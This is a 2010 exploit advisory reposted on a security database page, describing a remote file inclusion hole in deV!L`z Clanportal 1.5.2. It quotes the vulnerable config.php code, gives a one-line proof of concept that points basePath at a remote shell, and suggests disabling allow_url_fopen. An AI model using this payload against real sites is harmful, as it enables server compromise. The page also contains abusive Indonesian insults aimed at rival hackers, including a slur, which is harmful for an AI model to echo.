|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 7937 Credit : cr4wl3r Date : 15.03.2010 Exploit Code : ========================================================== deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability ========================================================== [+] deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I'm cr4wl3r member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered By: cr4wl3r [+] Download: http://www.dzcp.de/downloads/?action=download&id=131 [x] Code in [dzcp1.5.2/inc/config.php] ## REQUIRES ## require_once($basePath."/inc/mysql.php"); <--- RFI function show($tpl, $array) { global $tmpdir; $template = "../inc/_templates_/".$tmpdir."/".$tpl; if($fp = @fopen($template.".".html, "r")) $tpl = @fread($fp, filesize($template.".".html)); $array['dir'] = '../inc/_templates_/'.$tmpdir; foreach($array as $value => $code) { $tpl = str_replace('['.$value.']', $code, $tpl); } return $tpl; } [+] PoC: [path]/inc/config.php?basePath=[Shell] [+] Solution: Change php.ini and set allow_url_fopen to Off [+] Fuck To: Buat loe yang hanya bisa main loncat-loncat indah, mau ngaku hacker loe anjing. bisanya hanya jumping server. dasar dodol loe anjing gay. ngaku hacker bisanya hanya loncat indah. mau jadi penari loncat indah loe anjing??? wkwkwkwkwkwk Gw atau loe yang merasa tersindir anjing??? Ngentot aja loe. Main balon sana dodol. [+] Note: Kalau gw diajak gabung ama FO nya inj3ct0r, loe bisanya apa anjing. Tunjukin kalau loe juga bisa anjing. sayang loe engga dihadapan gw. gw lebih seneng berantem secara langsung. ingat gw baik-baik # ~ - [ [ : Inj3ct0r : ] ]  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |